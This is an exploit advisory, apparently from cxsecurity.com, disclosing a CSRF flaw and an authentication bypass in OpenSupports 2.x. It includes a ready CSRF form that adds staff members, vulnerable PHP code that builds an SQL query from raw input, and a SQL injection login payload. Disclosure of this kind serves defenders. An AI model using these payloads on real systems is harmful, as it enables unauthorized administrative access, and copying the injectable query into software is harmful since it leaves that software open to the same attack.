OpenSupports 2.x Authentication Bypass / Cross Site Request Forgery

2014.03.16
Risk: High
Local: No
Remote: Yes
CVE: N/A

[+] Author: TUNISIAN CYBER [+] Exploit Title: OpenSupports v2.x AuthBypass/CSRF Vulnerabilities [+] Date: 15-03-2014 [+] Category: WebApp [+] Version: 2.x [+] Tested on: KaliLinux/Windows 7 Pro [+] CWE: CWE-302/CWE-89 [+] Vendor: http://www.opensupports.com/ [+] Friendly Sites: na3il.com,th3-creative.com [+] Twitter: @TCYB3R 1.OVERVIEW: OpenSupports v2.x suffers from a CSRF and authentication bypass Vulnerabilities. 2.Version: 2.x 3.Background: http://www.opensupports.com/wiki/index.php?title=Main_Page 4.Proof Of Concept: CSRF:Add Staff Members <html> <form method="POST" name="form0" action="http://www.opensupports.com/demo/admin/staffadmin.php?id=agregar"> <input type="hidden" name="nombre" value="TCYB3Rx20x"/> <input type="hidden" name="email" value="g4k@hotmail.esxxx"/> <input type='submit' name='Submit4' value="Agregar"> </form> </html> Authentication Bypass: File: staff.php [PHP] if(isset($_POST['user'])){ $user = $_POST['user']; $pass = $_POST['pass']; $userreg=mysql_query("select * from staff WHERE user='$user' AND pass='$pass'") or die ("ERROR 1"); [PHP] Username:1'or'1'='1 Password:1'or'1'='1 5.Solution(s): no contact from vendor 6.TIME-LINE: 2014-13-03: Vulnerability was discovered. 2014-13-03: Contact with vendor. 2014-14-03: No reply. 2014-15-03: No reply. 2014-15-03: Vulnerability Published 7.Greetings: Xmax-tn Xtech-set N43il Sec4ver,E4A Members

References:

http://cxsecurity.com/issue/WLB-2014030012


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top